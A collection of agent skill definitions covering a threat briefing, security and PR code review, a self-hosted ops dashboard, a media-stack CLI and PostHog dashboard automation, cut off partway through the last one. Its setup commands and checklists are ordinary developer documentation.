@clawhub-solomonneas-65b0d825a2
Generate a daily or weekly cybersecurity threat briefing from open sources. Covers new vulnerabilities, active exploits, ransomware campaigns, APT activity,...
---
name: threat-briefing
description: Generate a daily or weekly cybersecurity threat briefing from open sources. Covers new vulnerabilities, active exploits, ransomware campaigns, APT activity, and industry-relevant threats.
triggers:
  - threat briefing
  - cyber news
  - security briefing
  - daily threats
  - weekly intel
---
# Threat Briefing
Generate a concise, actionable cybersecurity threat briefing.
## Briefing Structure
### Header
```
# Cybersecurity Threat Briefing
**Date:** [today's date]
**Period:** Last 24-48 hours | Last 7 days
**Analyst:** [agent name]
**TLP:** WHITE
```
### Priority Alerts (if any)
Active exploits or critical vulnerabilities requiring immediate action. Include: CVE ID, affected systems, exploitation status, patch availability.
### Top Stories (5-10 items)
For each story:
```
### [N]. [Headline]
**Category:** Vulnerability | Ransomware | APT | Supply Chain | Policy | Tool Release
**Relevance:** Higher-Ed | SMB | Enterprise | All
**Summary:** [2-3 sentences]
**Action Required:** [Yes/No] - [what to do if yes]
**Source:** [URL]
```
### Vulnerability Watch
New CVEs with CVSS >= 7.0 relevant to common stacks:
- Linux/Ubuntu
- Windows Server
- Network equipment (Cisco, Fortinet, Palo Alto)
- Web frameworks (Node.js, Python, PHP)
- Cloud services (AWS, Azure, GCP)
### Threat Actor Activity
Any notable APT or criminal group activity in the reporting period. Map to MITRE ATT&CK where possible.
### Recommendations
Prioritized action items for a small-to-mid security team:
1. [Highest priority action]
2. [Second priority]
3. [Third priority]
## Tailoring
- For higher-ed: emphasize student data (FERPA), research IP, BYOD risks
- For SMB: emphasize ransomware, business email compromise, supply chain
- For SOC operators: emphasize detection rules, IOCs, hunting queries
## Sources to Reference
Prefer: CISA KEV, NVD, BleepingComputer, The Record, Krebs on Security, Dark Reading, SecurityWeek, Mandiant/Google TAG, Microsoft MSRC
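The Vulnerability Watch threshold (CVSS >= 7.0) amounts to a filter plus a sort. The sketch below is one possible way to apply it before writing the section. The record shape (`id`, `cvss`, `product`) and the placeholder IDs are assumptions made for illustration, not a format this skill defines.

```javascript
// Hypothetical CVE records: field names and IDs are placeholders, not real data.
const candidates = [
  { id: 'CVE-XXXX-0001', cvss: 9.8, product: 'example-vpn-appliance' },
  { id: 'CVE-XXXX-0002', cvss: 5.3, product: 'example-web-framework' },
  { id: 'CVE-XXXX-0003', cvss: 7.0, product: 'example-linux-package' },
];

/** Keep entries at or above the threshold, highest score first. */
function vulnerabilityWatch(entries, minCvss = 7.0) {
  return entries
    .filter((entry) => typeof entry.cvss === 'number' && entry.cvss >= minCvss)
    .sort((a, b) => b.cvss - a.cvss);
}

for (const entry of vulnerabilityWatch(candidates)) {
  console.log(`${entry.id} (CVSS ${entry.cvss}) - ${entry.product}`);
}
```

Entries without a numeric score are dropped rather than guessed at, so they can be reviewed by hand.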
Review code changes for security vulnerabilities. Checks for OWASP Top 10, secrets exposure, injection flaws, auth issues, and insecure defaults. Use when re...
---
name: security-review
description: Review code changes for security vulnerabilities. Checks for OWASP Top 10, secrets exposure, injection flaws, auth issues, and insecure defaults. Use when reviewing PRs, commits, or code diffs.
triggers:
  - security review
  - check for vulnerabilities
  - secure code review
  - OWASP check
---
# Security Code Review
Review code changes for security vulnerabilities, following OWASP Top 10 and secure coding best practices.
## What to Check
### Injection (SQL, Command, LDAP, XSS)
- User input used in queries without parameterization
- Template literals in SQL strings
- `eval()`, `exec()`, `os.system()` with user input
- Unescaped output in HTML templates
### Authentication & Session
- Hardcoded credentials or API keys
- Weak password requirements
- Missing rate limiting on auth endpoints
- Session fixation or missing regeneration
- JWT without expiration or with weak signing
### Authorization
- Missing access control checks on endpoints
- IDOR (direct object reference without ownership check)
- Role checks that can be bypassed
- Privilege escalation paths
### Secrets & Data Exposure
- API keys, tokens, passwords in code or configs
- Sensitive data in logs
- PII without encryption
- .env files or secrets committed to git
### Configuration
- Debug mode enabled in production
- CORS set to wildcard (*)
- Missing security headers
- Default credentials unchanged
- Verbose error messages exposing internals
## Output Format
For each finding:
```
**FINDING:** [Title]
**Severity:** CRITICAL | HIGH | MEDIUM | LOW
**File:** [path:line]
**Code:** [the problematic code]
**Issue:** [what's wrong]
**Fix:** [how to fix it, with code example]
**OWASP:** [category reference]
```
## Rules
- Focus on HIGH and CRITICAL findings first
- Provide working fix code, not just descriptions
- If no security issues found, say so clearly
- Note any areas that need manual review (business logic, auth flows)
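The output format and the "HIGH and CRITICAL first" rule can be combined into a small formatter. This is a minimal sketch, not part of the skill itself. The finding object shape and the sample file paths are hypothetical.

```javascript
// Severity levels in the order the skill asks them to be reported.
const SEVERITY_ORDER = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW'];

function severityRank(severity) {
  const index = SEVERITY_ORDER.indexOf(severity);
  // Unknown labels sort last instead of jumping ahead of CRITICAL.
  return index === -1 ? SEVERITY_ORDER.length : index;
}

/** Return a new array with the most severe findings first. */
function sortFindings(findings) {
  return [...findings].sort((a, b) => severityRank(a.severity) - severityRank(b.severity));
}

/** Render one finding in the skill's seven-line output format. */
function renderFinding(finding) {
  return [
    `**FINDING:** ${finding.title}`,
    `**Severity:** ${finding.severity}`,
    `**File:** ${finding.file}`,
    `**Code:** ${finding.code}`,
    `**Issue:** ${finding.issue}`,
    `**Fix:** ${finding.fix}`,
    `**OWASP:** ${finding.owasp}`,
  ].join('\n');
}

// Hypothetical findings: paths and snippets are invented for illustration.
const findings = [
  {
    title: 'Verbose error message',
    severity: 'LOW',
    file: 'src/app.js:88',
    code: 'res.send(err.stack)',
    issue: 'Stack trace is returned to the client',
    fix: 'Log the stack server-side and return a generic message',
    owasp: 'A05:2021 Security Misconfiguration',
  },
  {
    title: 'SQL built from user input',
    severity: 'CRITICAL',
    file: 'src/users.js:42',
    code: "db.query('SELECT * FROM users WHERE id = ' + id)",
    issue: 'User input is concatenated into the query',
    fix: 'Use a parameterized query with a bound value for id',
    owasp: 'A03:2021 Injection',
  },
];

console.log(sortFindings(findings).map(renderFinding).join('\n\n'));
```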
Comprehensive pull request review covering code quality, security, performance, and maintainability. Use for any code review task.
---
name: pr-review
description: Comprehensive pull request review covering code quality, security, performance, and maintainability. Use for any code review task.
triggers:
  - review PR
  - code review
  - review changes
  - review diff
---
# Pull Request Review
Perform a thorough code review covering quality, security, performance, and maintainability.
## Review Checklist
### Code Quality
- Naming: clear, descriptive, consistent with codebase conventions
- Functions: single responsibility, reasonable length (<50 lines)
- Error handling: all failure paths covered, no swallowed exceptions
- Types: proper TypeScript/type annotations where applicable
- DRY: no unnecessary duplication
- Dead code: nothing unused or commented out
### Security (see also: security-review skill)
- No secrets or credentials in code
- Input validation on all user-facing endpoints
- Parameterized queries (no string concatenation for SQL)
- Proper auth/authz checks
### Performance
- N+1 query patterns
- Missing database indexes for new queries
- Unbounded loops or recursive calls
- Large payload responses without pagination
- Missing caching where appropriate
### Testing
- New functionality has tests
- Edge cases covered (empty arrays, null, boundaries)
- Tests are deterministic (no timing dependencies)
- Mocks are appropriate (not over-mocked)
### Maintainability
- Changes are documented (README, comments for complex logic)
- Breaking changes are noted
- Migration path is clear for schema changes
- Dependencies added are justified
## Output Format
Start with a summary:
```
## Review Summary
**Verdict:** APPROVE | REQUEST_CHANGES | COMMENT
**Risk Level:** Low | Medium | High
**Key Findings:** [1-3 sentence summary]
```
Then list findings by category, each with:
- File and line reference
- What the issue is
- Suggested fix (with code when helpful)
- Severity (blocking vs. nit)
End with:
```
## Positive Notes
[Things done well worth calling out]
```
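The skill lists three verdicts and two finding severities but does not say how one maps to the other. The sketch below shows one plausible mapping, stated here as an assumption: any blocking finding requests changes, nits alone produce a comment, and an empty list approves. The `severity` field name is hypothetical.

```javascript
/**
 * Derive a review verdict from findings.
 * Assumed mapping (not defined by the skill): blocking -> REQUEST_CHANGES,
 * nits only -> COMMENT, no findings -> APPROVE.
 */
function deriveVerdict(findings) {
  if (findings.some((finding) => finding.severity === 'blocking')) {
    return 'REQUEST_CHANGES';
  }
  return findings.length > 0 ? 'COMMENT' : 'APPROVE';
}

console.log(deriveVerdict([{ severity: 'nit' }, { severity: 'blocking' }]));
console.log(deriveVerdict([{ severity: 'nit' }]));
console.log(deriveVerdict([]));
```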
Full operational dashboard for AI agent setups. Cron job calendar, agent intel feeds, security audit panel, network infrastructure map, code search, repo arc...
---
name: ops-deck
version: 1.0.0
description: "Full operational dashboard for AI agent setups. Cron job calendar, agent intel feeds, security audit panel, network infrastructure map, code search, repo architecture viewer, prompt library, and sprint backlog tracker. Built for indie devs, small teams, and CS students running OpenClaw or similar agent stacks."
tags:
- dashboard
- devops
- monitoring
- security
- infrastructure
- agent-tools
- cron
- code-search
- prompt-library
- intel
category: tools
---
# Ops Deck — Full Operational Dashboard
A self-hosted operational dashboard for developers running AI agent stacks. See everything in one place: cron jobs, agent intel, security posture, infrastructure map, code search, and more.
For a simpler setup with just code search and prompt library, see [ops-deck-lite](https://clawhub.com/solomonneas/ops-deck-lite).
## What You Get
### Core Modules
| Module | Port | Description |
|--------|------|-------------|
| **Ops Deck UI** | 5173 | Vite + React dashboard (all modules in one UI) |
| **Ops Deck API** | 8005 | Express backend serving all data endpoints |
| **Code Search** | 5204 | Semantic code search with local embeddings |
| **Prompt Library** | 5202 | Categorized, searchable prompt templates |
### Dashboard Panels
**1. Memory Browser**
Searchable knowledge card viewer. Browse cards by category and tags, read full content with rendered markdown. Cards use YAML frontmatter for metadata (topic, category, tags, dates).
**2. Journal**
Date-based daily log viewer. See which days have entries, click to read. Great for tracking what your agent did each day.
**3. Workspace Config**
Tabbed viewer for your agent configuration files: AGENTS.md, SOUL.md, TOOLS.md, USER.md, MEMORY.md, IDENTITY.md. See your full agent personality and config at a glance.
**4. Cron Job Calendar**
Visual calendar of all scheduled agent tasks. See what runs when, last status, next run, error streaks. Click to view payload and delivery config.
```bash
# The API reads from a cron-jobs.json file, updated by a nightly cron
GET /api/cron-jobs
```
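The schema of `cron-jobs.json` is not specified here, so the following is only a sketch of how an "error streak" could be computed for the calendar. It assumes a hypothetical per-job `runs` array, ordered oldest first, where each run has a `status` field.

```javascript
/**
 * Count consecutive failed runs at the end of a job's history.
 * `runs` is a hypothetical array ordered oldest to newest.
 */
function errorStreak(runs) {
  let streak = 0;
  for (let i = runs.length - 1; i >= 0; i--) {
    if (runs[i].status !== 'error') break;
    streak++;
  }
  return streak;
}

// Hypothetical history for one job.
const history = [{ status: 'ok' }, { status: 'error' }, { status: 'error' }];
console.log(`error streak: ${errorStreak(history)}`);
```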
**5. Agent Intel Feed**
Aggregated intelligence from automated research crons. Three categories:
- **Cyber Threats:** CVEs, active exploits, advisories (from CISA, BleepingComputer, etc.)
- **AI Lab Updates:** Model releases, API changes, pricing updates
- **Dev Tooling:** Framework updates, SDK releases, breaking changes
```bash
# Intel entries with category filtering
GET /api/agent-intel
GET /api/agent-intel?category=model-updates
POST /api/agents/intel # Add new intel entry
```
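Category filtering on the GET endpoint could be handled along these lines. This is a sketch only. The entry fields and the `cyber-threats` and `dev-tooling` slugs are assumptions. Only `model-updates` appears in the request example above.

```javascript
// Hypothetical intel entries: field names and two of the slugs are assumed.
const entries = [
  { title: 'Example advisory', category: 'cyber-threats' },
  { title: 'Example model release', category: 'model-updates' },
  { title: 'Example SDK release', category: 'dev-tooling' },
];

/** Return entries matching the `category` query parameter, or all entries if it is absent. */
function filterIntel(allEntries, requestUrl) {
  // The base URL only exists so the URL parser accepts a relative path.
  const category = new URL(requestUrl, 'http://localhost:8005').searchParams.get('category');
  if (!category) return allEntries;
  return allEntries.filter((entry) => entry.category === category);
}

console.log(filterIntel(entries, '/api/agent-intel?category=model-updates'));
console.log(filterIntel(entries, '/api/agent-intel').length);
```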
**6. Security Audit Panel**
Live security posture dashboard. Tracks firewall rules, fail2ban status, SSH config, listening ports, AppArmor status, and pending security updates.
```bash
# Security audit data (updated by a daily cron)
GET /api/security-audit
```
Data structure:
```json
{
"lastUpdated": "2026-03-21T04:00:00Z",
"securityControls": [
{"name": "UFW Firewall", "status": "active", "lastChecked": "2026-03-21"},
{"name": "Fail2ban", "status": "active", "bannedIPs": 42},
{"name": "SSH Config", "status": "hardened", "passwordAuth": false}
],
"auditLog": []
}
```
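A panel or script consuming this structure might want a quick list of controls that need attention. The sketch below assumes that `active` and `hardened` are the healthy statuses, which is inferred from the sample data rather than documented. The `AppArmor` entry is invented to show a failing case.

```javascript
// Statuses treated as healthy: an assumption based on the sample data only.
const HEALTHY_STATUSES = new Set(['active', 'hardened']);

/** Return the names of controls whose status is not in the healthy set. */
function controlsNeedingAttention(auditData) {
  return auditData.securityControls
    .filter((control) => !HEALTHY_STATUSES.has(control.status))
    .map((control) => control.name);
}

const audit = {
  lastUpdated: '2026-03-21T04:00:00Z',
  securityControls: [
    { name: 'UFW Firewall', status: 'active', lastChecked: '2026-03-21' },
    { name: 'Fail2ban', status: 'active', bannedIPs: 42 },
    { name: 'SSH Config', status: 'hardened', passwordAuth: false },
    { name: 'AppArmor', status: 'inactive' }, // hypothetical failing control
  ],
  auditLog: [],
};

console.log(controlsNeedingAttention(audit));
```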
**7. Network Infrastructure Map**
Visual map of your services, ports, and connections. Populated from a JSON config file you maintain manually or generate with your own scripts.
```bash
# Architecture/infrastructure data
GET /api/architecture
```
**8. Code Search** (same as ops-deck-lite)
Semantic search across your entire codebase using local embeddings.
```bash
POST http://localhost:5204/api/search
{"query": "authentication middleware", "mode": "hybrid", "limit": 10}
```
**9. Prompt Library** (same as ops-deck-lite)
Categorized prompt templates. Stop rewriting the same prompts.
```bash
GET /api/prompts # List all
POST /api/prompts # Create new
```
**10. Sprint Backlog Tracker**
Kanban-style task tracking synced with your git repos. Auto-detects progress from recent commits.
```bash
# Backlog data (JSON file, updated by daily cron)
GET /api/backlog
```
## How Data Collection Works
> **The dashboard itself has no system access.** It reads static JSON files that YOU generate separately. The security audit panel, cron calendar, and infrastructure map all display data from JSON files on disk. You control what data goes into those files and how it's collected.
>
> **Example:** The security audit panel reads a JSON file from disk (`security-audit/audit-data.json` in the server example under Setup). You can populate it manually, generate it with a cron script you write and review, or skip it entirely. The dashboard never runs `ufw status`, `ss -tlnp`, or any other system command on its own.
>
> **No elevated privileges required.** The dashboard services run as a normal user. If you want automated data collection, the setup guide includes example cron scripts that you review and configure yourself.
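If you do write your own collection script, one detail worth handling is that the API may read a file while it is being rewritten. A common approach, sketched here with Node's standard library only, is to write to a temporary file and rename it into place. The function name and the sample payload are illustrative and not taken from the repo's scripts.

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

/** Write JSON to a temp file in the target directory, then rename it into place. */
function writeJsonAtomic(filePath, data) {
  const dir = path.dirname(filePath);
  const tmpPath = path.join(dir, `.${path.basename(filePath)}.${process.pid}.tmp`);
  fs.writeFileSync(tmpPath, JSON.stringify(data, null, 2) + '\n', 'utf8');
  // rename replaces the target in one step when both paths are on the same filesystem.
  fs.renameSync(tmpPath, filePath);
}

// Written to the OS temp directory so the sketch is safe to run as-is;
// point it at your dashboard's data directory in practice.
const target = path.join(os.tmpdir(), 'security-audit.example.json');
writeJsonAtomic(target, {
  lastUpdated: new Date().toISOString(),
  securityControls: [{ name: 'UFW Firewall', status: 'active' }],
  auditLog: [],
});
console.log(`wrote ${target}`);
```

Because the rename happens last, a reader sees either the old file or the complete new one, never a half-written file.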
## Architecture
```
┌──────────────────────────────────────┐
│         Ops Deck UI (:5173)          │
│       React + Vite + Tailwind        │
│  Panels: Cron | Intel | Security |   │
│  Infra | Code | Prompts | Backlog    │
└──────────┬───────────────────────────┘
           │
     ┌─────┴─────┐
     │           │
┌────▼────┐ ┌────▼────────┐
│   API   │ │ Code Search │
│ (:8005) │ │   (:5204)   │
│ Express │ │   FastAPI   │
└────┬────┘ └─────────────┘
     │
┌────▼───────────┐
│ Prompt Library │
│    (:5202)     │
│    Express     │
└────────────────┘
```
All services are local only. No cloud dependencies. No telemetry.
## Prerequisites
- Node.js 18+
- Python 3.10+ with FastAPI
- Ollama with `qwen3-embedding:8b` (for code search embeddings)
- PM2 (process manager)
- SQLite (no external database needed)
## Setup
### 1. Install dependencies
```bash
npm install -g pm2
pip install fastapi uvicorn aiofiles
ollama pull qwen3-embedding:8b
```
### 2. Create the API server
The Ops Deck API is a lightweight Express server that serves JSON data files and provides CRUD endpoints for intel entries.
```bash
mkdir -p ops-deck-api
cd ops-deck-api
npm init -y
npm install express cors
```
Key endpoints to implement:
```javascript
// server.js
const express = require('express');
const cors = require('cors');
const fs = require('fs');
const app = express();
app.use(cors());
app.use(express.json());
// Cron jobs (read from file, updated by nightly cron)
app.get('/api/cron-jobs', (req, res) => {
const data = JSON.parse(fs.readFileSync('./cron-jobs.json', 'utf8'));
res.json(data);
});
// Agent intel (CRUD)
app.get('/api/agent-intel', (req, res) => { /* ... */ });
app.post('/api/agents/intel', (req, res) => { /* ... */ });
// Security audit (read from file, updated by daily cron)
app.get('/api/security-audit', (req, res) => {
const data = JSON.parse(fs.readFileSync('./security-audit/audit-data.json', 'utf8'));
res.json(data);
});
// Architecture
app.get('/api/architecture', (req, res) => { /* ... */ });
// Backlog
app.get('/api/backlog', (req, res) => {
const data = JSON.parse(fs.readFileSync('./backlog.json', 'utf8'));
res.json(data);
});
app.listen(8005, () => console.log('Ops Deck API on :8005'));
```
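The handlers above call `fs.readFileSync` directly, so a missing or half-edited data file would surface as an unhandled exception and a 500 response. One way to soften that, sketched here as a suggestion and not as the project's actual code, is a small helper that falls back to a default value. The helper name and the fallback shape are hypothetical.

```javascript
const fs = require('node:fs');

/**
 * Read and parse a JSON file, returning `fallback` when the file is
 * missing or contains invalid JSON. Other errors (e.g. permissions) still throw.
 */
function readJsonOr(filePath, fallback) {
  try {
    return JSON.parse(fs.readFileSync(filePath, 'utf8'));
  } catch (err) {
    if (err.code === 'ENOENT' || err instanceof SyntaxError) {
      return fallback;
    }
    throw err;
  }
}

// A missing file yields the fallback instead of crashing the request.
console.log(readJsonOr('./does-not-exist.json', { jobs: [] }));
```

Inside a route this would read `res.json(readJsonOr('./cron-jobs.json', []))`, with the fallback chosen to match whatever shape the panel expects.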
### 3. Create the frontend
```bash
npm create vite@latest ops-deck -- --template react-ts
cd ops-deck
npm install
npm install tailwindcss @headlessui/react recharts
```
Build dashboard panels that fetch from the API endpoints. Each panel is a React component:
- `CronCalendar.tsx` - Monthly calendar view of cron jobs
- `IntelFeed.tsx` - Filterable intel card feed
- `SecurityAudit.tsx` - Status cards for each security control
- `InfraMap.tsx` - Service topology visualization
- `CodeSearch.tsx` - Search input with results display
- `PromptLibrary.tsx` - CRUD interface for prompts
- `Backlog.tsx` - Kanban board from backlog.json
### 4. (Optional) Set up data refresh scripts
The dashboard reads static JSON files. You can update them manually or write your own scripts to automate it. Example scripts are provided in the repo's `docs/` directory for reference. Review them before running.
All data collection is opt-in. The dashboard works with the included example data out of the box.
### 5. PM2 ecosystem config
```javascript
// ecosystem.config.cjs
module.exports = {
apps: [
{
name: 'opsdeck',
cwd: './ops-deck',
script: 'node_modules/.bin/vite',
args: '--host --port 5173',
autorestart: true,
},
{
name: 'opsdeck-api',
cwd: './ops-deck-api',
script: 'server.js',
autorestart: true,
},
{
name: 'code-search',
cwd: './code-search',
script: 'server.py',
interpreter: 'python3',
autorestart: true,
},
{
name: 'prompt-library-api',
cwd: './prompt-library/backend',
script: 'server.js',
autorestart: true,
},
]
};
```
```bash
pm2 start ecosystem.config.cjs
pm2 save
pm2 startup # auto-start on boot
```
## Resource Usage
| Service | RAM | CPU | Disk |
|---------|-----|-----|------|
| Ops Deck UI | ~75MB | <1% idle | ~20MB build |
| Ops Deck API | ~85MB | <1% idle | <5MB data |
| Code Search | ~150MB | <1% idle | ~50MB index |
| Prompt Library | ~50MB | <1% idle | <1MB |
| Ollama (shared) | ~4GB | Spikes during indexing | ~4GB model |
Total: ~360MB for all services (Ollama runs independently).
## Customization
The dashboard is yours to extend. Common additions:
- **Social media pipeline** panel (if you run Postiz/n8n)
- **LLM usage tracking** (token counts, costs, model breakdown)
- **Uptime monitoring** (ping your deployed services)
- **Git activity** (commit heatmap, PR status)
## Who This Is For
- **Indie devs** running OpenClaw with multiple cron jobs and services
- **CS students** building a portfolio of operational tools
- **Small teams** who want visibility into their agent infrastructure
- **Homelab enthusiasts** who want a single pane of glass
If you just want code search and prompts, use [ops-deck-lite](https://clawhub.com/solomonneas/ops-deck-lite) instead. This is the full stack.
## Source
https://github.com/solomonneas/ops-deck-oss
Single-file bash CLI for the *arr media stack. Manage Sonarr, Radarr, Prowlarr, qBittorrent, Bazarr, Jellyseerr, and Tdarr from the terminal or via AI agents...
---
name: media-cli-local
version: 1.0.0
description: "Single-file bash CLI for the *arr media stack. Manage Sonarr, Radarr, Prowlarr, qBittorrent, Bazarr, Jellyseerr, and Tdarr from the terminal or via AI agents. Runs on the same machine as your services. No Docker, no Node, no Python packages."
tags:
  - media
  - sonarr
  - radarr
  - plex
  - jellyfin
  - torrents
  - automation
  - homelab
  - arr
category: tools
---
# media-cli-local: Terminal Control for Your *arr Media Stack
One bash script to manage your entire media automation stack. Search, add, download, and monitor movies and TV shows without touching a web UI.
Designed for setups where the agent and media services run on the **same machine**. If your *arr stack runs on a different host, see [media-cli](https://clawhub.com/solomonneas/media-cli) which includes SSH remote support.
**Source:** https://github.com/solomonneas/media-cli
**Install:** Clone the repo and copy the script to your PATH. Review it first.
```bash
git clone https://github.com/solomonneas/media-cli.git
cd media-cli
cp media ~/bin/media && chmod +x ~/bin/media
media setup
```
## Supported Services
| Service | Required | What It Does |
|---------|----------|-------------|
| Sonarr | Yes | TV show management |
| Radarr | Yes | Movie management |
| Prowlarr | Yes | Indexer management |
| qBittorrent | Yes | Download monitoring |
| Bazarr | Optional | Subtitles |
| Jellyseerr | Optional | User requests + trending |
| Tdarr | Optional | Transcode monitoring |
## Setup
The setup wizard asks for API URLs and keys, saves to `~/.config/media-cli/config` (chmod 600). All connections are localhost only.
```bash
media setup    # Interactive config wizard
media status   # Verify everything connects
```
## Commands
### Movies
```bash
media movies search "Interstellar"   # Search online
media movies add "Interstellar"      # Add + start downloading
media movies list                    # Library with download status
media movies missing                 # Monitored without files
media movies remove "title"          # Remove (keeps files)
```
### TV Shows
```bash
media shows search "Breaking Bad"    # Search online
media shows add "Breaking Bad"       # Add + search episodes
media shows list                     # Library with episode counts
```
### Downloads
```bash
media downloads                      # All torrents by state
media downloads active               # Active with speed + ETA
media downloads pause <hash|all>
media downloads resume <hash|all>
media downloads remove <hash> [true] # true = delete files too
```
### Status & Monitoring
```bash
media status        # Health + library counts + active downloads
media queue         # Sonarr/Radarr download queues
media wanted        # Missing episodes + movies
media calendar 14   # Upcoming releases (next N days)
media history       # Recent activity
media refresh       # Trigger library rescan
media indexers      # Prowlarr indexer status
```
### Subtitles (Bazarr)
```bash
media subs           # Wanted subtitles
media subs history   # Recent subtitle downloads
```
### Requests (Jellyseerr)
```bash
media requests            # Pending user requests
media requests trending   # What's trending
media requests users      # User list with request counts
```
### Transcoding (Tdarr)
```bash
media tdarr           # Status + active workers
media tdarr workers   # Per-file progress: %, fps, ETA
media tdarr queue     # Items queued for processing
```
## AI Agent Integration
Commands output clean, parseable text designed for AI agents:
```
"What shows am I missing episodes for?"
→ media wanted
"Add Succession"
→ media shows add "Succession"
"What's downloading right now?"
→ media downloads active
"Pause all downloads"
→ media downloads pause all
```
Works with OpenClaw, LangChain, Claude computer use, or any agent framework with shell execution.
## Requirements
- bash 4.0+
- curl
- python3 (standard library only, no pip)
## Technical Details
- Single bash script (~900 lines)
- All API calls go to localhost (no remote connections)
- Talks to *arr v3 APIs (Sonarr/Radarr), v1 (Prowlarr), v2 (qBittorrent WebUI)
- Python3 used strictly for JSON parsing (standard library)
- No telemetry, no analytics, no network calls except to your own services
- Config stored at `~/.config/media-cli/config` with chmod 600
Automate PostHog dashboard creation, sync, update, and export via API. Covers dashboard CRUD, insight creation, cohort management, and API-driven analytics w...
---
name: posthog-analytics
description: "Automate PostHog dashboard creation, sync, update, and export via API. Covers dashboard CRUD, insight creation, cohort management, and API-driven analytics workflows."
version: 1.2.0
env:
  - name: POSTHOG_PERSONAL_API_KEY
    required: true
    description: "PostHog personal API key with read/write access"
  - name: POSTHOG_HOST
    required: false
    default: "us.i.posthog.com"
    description: "PostHog API host (EU: eu.i.posthog.com)"
  - name: POSTHOG_UI_HOST
    required: false
    default: "us.posthog.com"
    description: "PostHog UI host for dashboard URLs"
---
# PostHog Analytics Skill
Automate PostHog dashboard creation, sync, update, and export via API.
## Prerequisites
### Required Tools
- `curl` - HTTP client (pre-installed on macOS/Linux)
- `jq` - JSON processor: `brew install jq` or `apt install jq`
- `bash` - Shell (the script is bash)
### PostHog API Key
1. Go to [PostHog Settings → Personal API Keys](https://us.posthog.com/settings/user-api-keys)
2. Create a new key with read/write access
3. Export it:
```bash
export POSTHOG_PERSONAL_API_KEY=phx_xxx
```
**Note**: The API key determines your organization and project. The script uses `@current` project context (your default project).
### Verify Setup
```bash
# Test your API key - should return your project info
curl -s -H "Authorization: Bearer $POSTHOG_PERSONAL_API_KEY" \
"https://us.i.posthog.com/api/projects/@current/" | jq '{id, name}'
```
Expected output:
```json
{
"id": 209268,
"name": "Default project"
}
```
If you get an error, check that your API key is correct and has read/write access.
## Quick Start: Blog Analytics Example
### Step 1: Write Your Config
Create `blog_dashboard.json`:
```json
{
"name": "Blog Analytics",
"description": "Track blog performance and reader engagement",
"filter": {"key": "source", "value": "blog"},
"dashboard_id": null,
"insights": [
{"name": "Blog Pageviews (Total)", "type": "pageviews_total"},
{"name": "Unique Blog Readers", "type": "unique_users"},
{"name": "Blog Traffic Trend", "type": "traffic_trend"},
{"name": "Top Blog Posts", "type": "top_pages"}
]
}
```
**Note**: Set `dashboard_id: null` for new dashboards.
### Step 2: Create Dashboard
```bash
./scripts/posthog_sync.sh create blog_dashboard.json
```
**Output**:
```
Creating dashboard: Blog Analytics
Dashboard created: ID 1166599
Creating insight: Blog Pageviews (Total)
{id: 6520531, name: "Blog Pageviews (Total)"}
...
Dashboard URL: https://us.posthog.com/project/209268/dashboard/1166599
```
The script:
- Creates a new dashboard in your PostHog project
- Returns **dashboard_id** (e.g., `1166599`) and **project_id** (e.g., `209268`) in the URL
- **Automatically updates** your config file with the `dashboard_id`
### Step 3: Add New Insights (Sync)
Edit config to add new insights, then:
```bash
./scripts/posthog_sync.sh sync blog_dashboard.json
```
Only creates NEW insights. Existing ones (matched by name) are **skipped**.
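The name-matching rule can be pictured as a set difference between the config and what is already on the dashboard. The bundled script does this in bash; the sketch below restates the idea in JavaScript for clarity. The function name `planSync` is illustrative.

```javascript
/**
 * Split config insights into those to create and those to skip,
 * matching on the exact insight name.
 */
function planSync(configInsights, existingNames) {
  const existing = new Set(existingNames);
  return {
    create: configInsights.filter((insight) => !existing.has(insight.name)),
    skip: configInsights.filter((insight) => existing.has(insight.name)),
  };
}

const plan = planSync(
  [
    { name: 'Blog Pageviews (Total)', type: 'pageviews_total' },
    { name: 'Top Blog Posts', type: 'top_pages' },
  ],
  ['Blog Pageviews (Total)']
);
console.log(plan.create.map((insight) => insight.name));
console.log(plan.skip.map((insight) => insight.name));
```

Matching is by exact name, so renaming an insight in the config makes sync treat it as new.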
### Step 4: Update Existing Insights
Changed your filter? Edit config, then:
```bash
./scripts/posthog_sync.sh update blog_dashboard.json
```
Updates ALL insights with current config settings. Use when changing filters.
### Step 5: Export Existing Dashboard
```bash
./scripts/posthog_sync.sh export 1166599 > exported_dashboard.json
```
## Config Reference
| Field | Required | Description |
|-------|----------|-------------|
| `name` | Yes | Dashboard name |
| `description` | No | Dashboard description |
| `filter` | No* | Event property filter: `{"key": "source", "value": "blog"}` |
| `domain_filter` | No* | URL filter fallback: `"blog.sylph.ai"` |
| `dashboard_id` | No | Set to `null` for create, or existing ID for sync/update |
| `insights` | Yes | Array of insight objects |
*At least one filter recommended. `filter` takes precedence over `domain_filter`.
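The precedence rule mirrors what `build_insight_payload` does in the bundled script: an event property filter wins, the domain filter is a URL-substring fallback, and with neither the properties list stays empty. Here is the same logic restated as a JavaScript sketch. The function name is illustrative.

```javascript
/**
 * Build the event property filter list from a dashboard config.
 * `filter` takes precedence over `domain_filter`.
 */
function buildProperties(config) {
  const { filter, domain_filter: domainFilter } = config;
  if (filter) {
    return [{ key: filter.key, value: filter.value, type: 'event' }];
  }
  if (domainFilter) {
    return [{ key: '$current_url', value: domainFilter, operator: 'icontains', type: 'event' }];
  }
  return [];
}

console.log(buildProperties({ filter: { key: 'source', value: 'blog' }, domain_filter: 'blog.sylph.ai' }));
console.log(buildProperties({ domain_filter: 'blog.sylph.ai' }));
```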
### Insight Types
| Type | Display | Description |
|------|---------|-------------|
| `pageviews_total` | BoldNumber | Total pageview count |
| `unique_users` | BoldNumber | Unique visitors (DAU) |
| `traffic_trend` | ActionsLineGraph | Traffic over time |
| `top_pages` | ActionsTable | Top pages breakdown |
### Optional Insight Fields
| Field | Default | Options |
|-------|---------|---------|
| `math` | `total` | `total`, `dau`, `weekly_active`, `monthly_active` |
| `display` | Auto | `BoldNumber`, `ActionsLineGraph`, `ActionsTable` |
| `date_range` | `-30d` | `-7d`, `-30d`, `-90d`, etc. |
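How the defaults resolve can be sketched as a lookup keyed on insight type. The display and math values below are read off the `case` statement in `scripts/posthog_sync.sh`. Note that in that script the per-type math is assigned unconditionally for these four types, so this sketch does the same. Throwing on an unknown type is a choice made for this sketch, not the script's behavior.

```javascript
// Per-type defaults as they appear in the bundled script's case statement.
const TYPE_DEFAULTS = {
  pageviews_total: { display: 'BoldNumber', math: 'total' },
  unique_users: { display: 'BoldNumber', math: 'dau' },
  traffic_trend: { display: 'ActionsLineGraph', math: 'total' },
  top_pages: { display: 'ActionsTable', math: 'total' },
};

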